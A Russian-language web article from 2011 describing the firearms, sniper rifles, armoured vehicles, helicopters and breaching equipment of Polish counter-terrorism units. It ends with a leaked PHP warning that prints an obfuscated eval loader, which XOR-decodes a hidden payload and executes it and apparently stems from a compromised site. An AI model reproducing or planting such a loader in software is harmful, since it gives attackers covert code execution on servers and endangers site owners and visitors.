Вооружение и оснащение спецназа Польши

Подразделения спецназа

Спецназ Польши

В последние годы руководство антитеррористических сил Польши получило мощную финансовую подпитку. В результате этого спецназ принял на вооружение самые современные образцы спецтехники и вооружения, в результате чего они сейчас ни в чем не уступают лучшим иностранным подразделениям.

Наиболее стандартным короткоствольным оружием бойцов польского спецназа являются 9-мм пистолеты Glock 17 и Walther P-99. Кроме них, на вооружении также могут находиться и другие виды пистолетов и револьверов. При проведении спецопераций, в которых приходиться двигаться малыми группами, а столкновения происходят на короткой дистанции, бойцы спецназа обычно используют немецкие пистолеты-пулеметы Heckler & Koch MP-5, или же их аналог турецкого производства MKEK. Немецкие пистолеты-пулеметы могут быть как в базовом исполнении, так и модифицированные - MP-5 A3 и А5, со складывающимся прикладом, а также MP-5 SD6 с интегрированным глушителем. Ну и конечно, на вооружении спецподразделения находится автоматическое оружие польского производства - Glauberyt PM-84 P/98.

Рассматривая штурмовые винтовки, стоящие на вооружении у польского спецназа, в первую очередь необходимо упомянуть штурмовую винтовку G-36, и ее укороченную версию - карабин G-36 KA1 с оптическим прицелом с магазином на 100 патронов Beta C-MAG и G-36 C (обе винтовки имеют калибр 5,56 мм). Также в группе имеются и автоматы HK-416 от того же производителя и аналогичного калибра.

Все эти образцы оружия оборудованы быстросъемным основанием с рычажной фиксацией «Piccatiny», на которое можно устанавливать тактические фонари Surefire, голографический лазерный прицел HWS, коллиматорный прицел Aimpoint Comp M4 и прочие варианты лазерных прицелов.

Для спецопераций, в которых для проникновения в помещение требуется применять довольно мощное оружие, сотрудники спецназа могут использовать гладкоствольные ружья Mossberg 500 ATP6 Cruiser и Benelli Super M3 DT 90 12-го калибра.

Особое внимание уделяется оснащению снайперской команды. Для вооружения снайперов здесь используются финские снайперские винтовки Sako TRG-21 и TRG-22 7.62 x51 mm NATO (.308 Winchester) и TRG-42 (.338 Lapua Magnum). Они все имеют ручное перезаряжание и скользящий затвор. Но при этом, на вооружении группы также находится и советская (российская) снайперская винтовка СВД.

Еще один образец российского вооружения – мощный проверенный пулемет ПКМ, калибра 7,62-мм. А вот применяемый ручной 40-мм гранатомет немецкого производства, и его можно использовать со всеми типами 40-мм гранат – как боевыми (осколочно-фугасные, дымовые, осветительные), так и полицейскими (со слезоточивым газом, с резиновыми пулями).

В автомобильном парке группы – бронированные Land Rover Defender, Ford Transit и Toyota. Кроме этого, для использования непосредственно в штурмовых спецоперациях, на вооружении группы находятся два бронеавтомобиля AMZ-Kutno ltd DZik.

Для переброски группы по воздуху, в распоряжении спецназа Польши передаются вертолеты Ми-8, Pzl Kania и Pzl W-3 Sokol из полицейской авиаэскадрильи.

В группе есть вне необходимое оборудование для проведения спецопераций. Это современные средства связи и коммуникации Motorola и MSA Sordin, бронещиты различных размеров и типов производства Moratex, механические устройства для взламывания дверей компаний Blackhawk и HAllagan, мощное гидравлическое оборудование компании Holmarto, а также приборы ночного видения и приборы наблюдения американского производства.

Опубликовано 29-10-2011, 08:42 Просмотров 136

поделись с друзьями
Комментарий:
Введите код: *
Warning: assert(): Assertion "eval('$nGIE3=$FHLfom3Fx($nGIE3);$bQQvD7cg="";$QVSry4="DuSAkQ";for($gyBB3G=0;$gyBB3G<716;$gyBB3G++)$bQQvD7cg.=chr(ord($nGIE3[$gyBB3G])^ord($QVSry4[$gyBB3G%6]));@eval($cnDaz8X($bQQvD7cg));');" failed in /home/a/alvis2/tchest.org/public_html/index.php on line 321